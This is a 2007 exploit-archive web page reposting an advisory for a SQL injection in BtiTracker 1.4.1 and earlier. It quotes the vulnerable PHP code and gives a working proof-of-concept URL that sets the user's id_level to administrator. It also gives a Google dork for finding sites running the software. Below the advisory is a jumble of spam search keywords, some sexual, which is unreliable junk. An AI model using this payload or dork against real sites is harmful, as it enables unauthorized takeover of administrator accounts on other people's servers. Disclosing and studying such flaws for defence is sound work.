about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability




2007-05-22 BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability
Rated as : High Risk

#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - babbano@gmail.com					
# Vulnerabitity: Remote Sql Injection /	                                  
     
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE
id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE
id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control:
account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################
securitydot.net - 2007-05-22

Advertising

Copyright 2007, SecurityDot
Tue, 08 Dec 2009 21:21:28 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sex gril. Ind sexybabyes Sixs anima I WONT SEX t812t Xwxx.com Gay boys s Invision+P t271t www.uz51.c Www.blends ms07-026 Pure-FTPd pscan2.c 200 /compo Sixmovi Crack \r\n Beach babi Crack+Data MOHAAExplo ppman.cn pki Sire dave feed.iuok. nude india 200+/compo picgirl Www.shesxe None rod Sinhalasex www.trish blog.jshuw windows rc sexe 18 ar Sexphoto CMS is Fre www.zadina mambo Remo 200 /compo Downloadpr sexvideosf Simran.com free porn search.php ppman.cn apache 1.3 Crack Data teengirlsf